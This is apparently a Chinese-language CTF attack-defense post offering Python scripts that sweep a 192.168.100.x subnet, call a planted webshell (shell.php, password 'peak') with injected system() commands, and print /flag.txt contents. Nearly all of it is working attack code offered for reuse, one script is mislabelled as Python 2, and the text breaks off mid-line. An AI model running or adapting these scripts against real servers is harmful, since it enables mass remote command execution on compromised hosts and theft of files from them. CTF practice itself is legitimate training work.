自动利用webshell脚本+执行系统命令

python2脚本 # -*- coding: utf-8 -*- import urllib.request import threading def cat_flag(): cmd = "cat%20/flag.txt" # 还可用cut -c1- /flag.txt path = "shell.php" passwd = "peak" for i in range(110, 140): ip = "192.168.100." + str(i) print(ip) system1= 'system("' + cmd + '");' system2 = passwd + "=" + system1 url = "https://" + ip + "/" + path + "?" + system2 try: response = urllib.request.urlopen(url) html = response.read().decode('utf-8') if "404" in html: print(ip,"#############################################NO flag#######################################################") else: print(ip, html) print("#################################################fflag在上面##################################################") except: pass print("error") t = threading.Thread(target=cat_flag) t.start() python3脚本 # -*- coding: utf-8 -*- import requests import threading def get_flag(ip,path,cmd,passwd): system1= 'system("' + cmd + '");' system2 = passwd + "=" + system1 url = "https://" + ip + "/" + path + "?" + system2 #print(system2) #print(url) try: r = requests.get(url) if "404" in r.text: print("--------------------------------------------------No flag------------------------------------------------------------") print() else: print(url,r.text) print(ip) print("--------------------------------------------------上面是flag---------------------------------------------------------") except: pass cmd = "cat /flag.txt"#还可用cut -c1- /flag.txt path = "shell.php" passwd = "peak" for i in range(1,139): #print(i) ip = "192.168.100."+str(i) #print(ip) t = threading.Thread(target=get_flag,args=(ip,path,cmd,passwd)) t.start() python2脚本 # -*- coding: utf-8 -*- import urllib.r